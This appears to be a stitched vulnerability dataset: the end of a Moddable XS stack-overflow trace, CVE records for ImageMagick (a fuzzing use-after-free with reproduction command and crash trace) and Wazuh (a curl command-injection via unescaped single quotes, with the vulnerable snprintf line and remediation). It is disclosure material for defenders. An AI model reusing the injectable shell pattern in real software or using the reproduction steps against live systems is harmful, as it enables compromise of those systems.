#128 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#129 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#130 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#131 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#132 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#133 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#134 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#135 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#136 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#137 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#138 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#139 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#140 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#141 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#142 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#143 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#144 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#145 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#146 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#147 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#148 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#149 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#150 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#151 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#152 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#153 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#154 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#155 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#156 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#157 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#158 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#159 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#160 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#161 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#162 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#163 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#164 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#165 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#166 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#167 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#168 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#169 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#170 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#171 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#172 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#173 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#174 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#175 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#176 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#177 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#178 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#179 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#180 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#181 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#182 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#183 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#184 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#185 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#186 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#187 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#188 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#189 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#190 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#191 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#192 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#193 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#194 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#195 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#196 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#197 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#198 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#199 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#200 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#201 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#202 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#203 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#204 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#205 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#206 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#207 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#208 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#209 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#210 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#211 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#212 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#213 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#214 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#215 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#216 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#217 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#218 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#219 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#220 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#221 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#222 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#223 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#224 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#225 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#226 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#227 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#228 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#229 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#230 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#231 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#232 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#233 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#234 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#235 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#236 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#237 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#238 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#239 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#240 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#241 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#242 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#243 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#244 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#245 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#246 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#247 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#248 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#249 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#250 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#251 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
SUMMARY: AddressSanitizer: stack-overflow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:265 fxBinaryExpressionNodeDistribute
==6025==ABORTING
``` | stack-overflow(fxBinaryExpressionNodeDistribute) | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/587/comments | 2 | 2021-02-26T10:36:48Z | 2021-03-23T22:52:57Z | https://github.com/Moddable-OpenSource/moddable/issues/587 | 817,241,227 | 587 | 2,799 |
CVE-2021-3962 | 2021-11-19T17:15:08.733 | A flaw was found in ImageMagick where it did not properly sanitize certain input before using it to invoke convert processes. This flaw allows an attacker to create a specially crafted image that leads to a use-after-free vulnerability when processed by ImageMagick. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023196"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/82775af03bbb10a0a1d0e15c0156c75673b4525e"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/4446"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2023196"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/82775af03bbb10a0a1d0e15c0156c75673b4525e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/4446"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-14:*:*:*:*:*:*:*",
"matchCriteriaId": "1F791E1D-6A0A-47F0-8219-51EE22C2F467",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/ImageMagick/ImageMagick/issues/4446 | [
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.0-14
### Operating system
Linux
### Operating system, version and so on
OS: Ubuntu 18.04.6 LTS Version: ImageMagick 7.1.0-14 Q16-HDRI x86_64 2021-10-28 https://imagemagick.org Copyright: (C) 1999-2021 ImageMagick Studio Delegates (built-in): fontconfig freetype jng jpeg lzma pangocairo png x xml zlib Compiler: gcc (4.2)
### Description
Hello,
We are currently working on fuzz testing feature, and we found a **heap-use-after-free** on **magick**.
### Steps to Reproduce
build it
`./configure --disable-shared && make && make install
`
run it
`
./magick convert -adjoin -alpha copy -antialias -append -auto-gamma -auto-level -auto-orient poc /dev/null
`
output
### free(): double free detected in tcache 2
When I compile in ASAN mode
`
./magick convert -adjoin -alpha copy -antialias -append -auto-gamma -auto-level -auto-orient poc /dev/null
`
=================================================================
==11927==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000580 at pc 0x000000f0f98c bp 0x7ffe3d8a7fd0 sp 0x7ffe3d8a7fc8
READ of size 8 at 0x60f000000580 thread T0
#0 0xf0f98b in RelinquishDCMMemory /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3039:20
#1 0xf08eb8 in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:4002:11
#2 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15
#3 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9
#4 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18
#5 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14
#6 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10
#7 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10
#8 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x549e99 in _start (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x549e99)
0x60f000000580 is located 144 bytes inside of 168-byte region [0x60f0000004f0,0x60f000000598)
freed by thread T0 here:
#0 0x5c4af2 in free (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x5c4af2)
#1 0xf0f82c in RelinquishMagickMemory /root/fuzz/target/imagemagick/ImageMagick/MagickCore/memory.c:1167:3
#2 0xf0f82c in RelinquishDCMMemory /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3043:35
#3 0xf08e0b in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3999:9
#4 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15
#5 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9
#6 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18
#7 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14
#8 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10
#9 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10
#10 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
previously allocated by thread T0 here:
#0 0x5c4d5d in malloc (/root/fuzz/target/imagemagick/ImageMagick/install/bin/magick+0x5c4d5d)
#1 0xefb803 in AcquireMagickMemory /root/fuzz/target/imagemagick/ImageMagick/MagickCore/memory.c:558:10
#2 0xefb803 in ReadDCMImage /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3142:33
#3 0x65b638 in ReadImage /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:563:15
#4 0x6602d3 in ReadImages /root/fuzz/target/imagemagick/ImageMagick/MagickCore/constitute.c:955:9
#5 0x15bd745 in ConvertImageCommand /root/fuzz/target/imagemagick/ImageMagick/MagickWand/convert.c:611:18
#6 0x177d150 in MagickCommandGenesis /root/fuzz/target/imagemagick/ImageMagick/MagickWand/mogrify.c:188:14
#7 0x5f9924 in MagickMain /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:150:10
#8 0x5f9924 in main /root/fuzz/target/imagemagick/ImageMagick/utilities/magick.c:182:10
#9 0x7f35dfd66bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-use-after-free /root/fuzz/target/imagemagick/ImageMagick/coders/dcm.c:3039:20 in RelinquishDCMMemory
Shadow bytes around the buggy address:
0x0c1e7fff8060: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff8070: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c1e7fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff8090: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fd fd
0x0c1e7fff80a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c1e7fff80b0:[fd]fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==11927==ABORTING
### Images
[poc.zip](https://github.com/ImageMagick/ImageMagick/files/7489944/poc.zip)
| heap-use-after-free in magick at dcm.c RelinquishDCMMemory | https://api.github.com/repos/ImageMagick/ImageMagick/issues/4446/comments | 5 | 2021-11-06T05:20:44Z | 2021-11-23T07:52:32Z | https://github.com/ImageMagick/ImageMagick/issues/4446 | 1,046,416,827 | 4,446 | 2,800 |
CVE-2021-44079 | 2021-11-22T07:15:07.017 | In the wazuh-slack active response script in Wazuh 4.2.x before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/pull/10809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/issues/10858#issuecomment-991118254"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/wazuh/wazuh/pull/10809"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07EA0D69-0063-4F4A-83A9-65FB55D7B714",
"versionEndExcluding": "4.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"77"
] | 77 | https://github.com/wazuh/wazuh/issues/10858 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"wazuh",
"wazuh"
] | |Wazuh version|Component|Install type|Install method|Platform|Fix|
|---|---|---|---|---|---|
| 4.2.0 | Active-response script | Manager/Agent | Packages | CentOS 7 |#10809|
This issue was reported by @rk700.
We found a command injection bug in the active-response script [wazuh-slack](https://github.com/wazuh/wazuh/blob/master/src/active-response/wazuh-slack.c).
The alert JSON data is put in the shell command line as POST body for `curl`:
```c
snprintf(system_command, OS_MAXSTR -1, "curl -H \"Accept: application/json\" -H \"Content-Type: application/json\" -d '%s' %s", output_str, site_url);
```
However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command:
```
-d '<json data that could be partially controlled>'
```
## Remediation
1. Prevent default Active Response tools from executing arbitrary code. Replace `system()` function call with `wpopenv()`, which executes subprocesses without a shell.
|Active response tool|Platform|
|---|---|
|`disable-account`|UNIX|
|`firewalld-drop`|Linux|
|`netsh`|Windows|
|`route-null`|Windows|
|`wazuh-slack`|UNIX|
2. Sanitize the AR payload by the manager for agents between 4.2.0 and 4.2.4, in order to prevent this hazard in outdated agents. Convert control characters into their hexadecimal notation:
|Character|Conversion|
|---|---|
|Exclamation mark (`!`)|`\x21`|
|Dollar (`$`)|`\x24`|
|Single quote (`'`)|`\x27`|
